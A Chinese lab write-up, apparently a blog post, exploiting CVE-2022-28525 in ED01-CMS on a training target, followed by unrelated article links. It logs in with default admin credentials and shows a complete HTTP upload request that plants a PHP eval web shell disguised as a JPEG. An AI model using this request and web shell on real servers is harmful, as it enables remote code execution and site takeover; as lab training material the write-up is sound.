当前位置: 首页 > news >正文

【春秋云境】CVE-2022-28525

news 2025/8/26 20:20:51

靶标介绍:

​ ED01-CMS v20180505 存在任意文件上传漏洞

打开靶场:
在这里插入图片描述
盲猜一波弱密码admin:admin就进去了。登录后在图中位置点击进行图片更新,需要将密码等都写上

在这里插入图片描述
在这里插入图片描述
抓包将图片信息进行替换,并修改文件名:

POST /admin/users.php?source=edit_user&id=41 HTTP/1.1
Host: eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com
Content-Length: 1347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytvURtujfCTmeOmyA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.69
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com/admin/users.php?source=edit_user&id=41
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=opuds1itmvgqublp4qr0mivo76
Connection: close------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_id"41
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_uname"admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_email"admin@aaa.com
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_pass1"admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_pass2"admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_fname"admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_lname"admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_image"new
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="new_image"; filename="shell.php"
Content-Type: image/jpeg<?php @eval($_POST[cnm]);?>
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_role"Administrator
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_status"Active
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="updateusersubmit"------WebKitFormBoundarytvURtujfCTmeOmyA--

最后找到图片位置,上蚁剑。

http://www.lryc.cn/news/15849.html

相关文章:

  • Android设置取消系统闹钟
  • 使用 Node.js 多进程提高任务执行效率
  • [Golang实战]github.io部署个人博客hugo[新手开箱可用][小白教程]
  • 50个 Pandas 高频操作技巧,建议收藏
  • pygraphviz安装教程
  • HarmonyOS Connect认证测试
  • Datawhale团队第九期录取名单!
  • ChatGPT 的原理与未来研究方向
  • 基于UIAutomation+Python+Unittest+Beautifulreport的WindowsGUI自动化测试框架主入口main解析
  • 华为OD机试真题Python实现【挑选字符串】真题+解题思路+代码(20222023)
  • Orcad放置字符标注、文本框、注释及图片方法教程
  • 秒懂算法 | 子集树模型——0-1背包问题的回溯算法及动态规划改进
  • koc转化效果评估模型是什么?如何根据模型来进行投放
  • vuejs-datepicker|简单易用的Vue.js日期选择组件
  • 【c++】类和对象3—初始化列表、类对象作为类成员、静态成员
  • 【基础算法】数的范围
  • FreeRTOS入门(01):基础说明与使用演示
  • 华为OD机试真题Python实现【交换字符】真题+解题思路+代码(20222023)
  • Word处理控件Aspose.Words功能演示:使用 Java 在 MS Word 文档中进行邮件合并
  • 产品未出 百度朋友圈“开演”
  • emacs 中的键盘宏
  • TCP/IP网络编程——关于 I/O 流分离的其他内容
  • 【BCT认证_组播DNS】 DNS SRV RR
  • 【验证码的识别】—— 点触式验证码的识别
  • 深入浅出C++ ——priority_queue类深度剖析
  • 117.Android 简单的拖拽列表+防止越界拖动(BaseRecyclerViewAdapterHelper)
  • 什么是Struts2?有哪些优势
  • Ubuntu22.04 安装Mongodb6.X
  • 启动内核,能启动内核但是无法进入内核,始终卡在某一地方,比如 No soundcards found.
  • SQL零基础入门学习(六)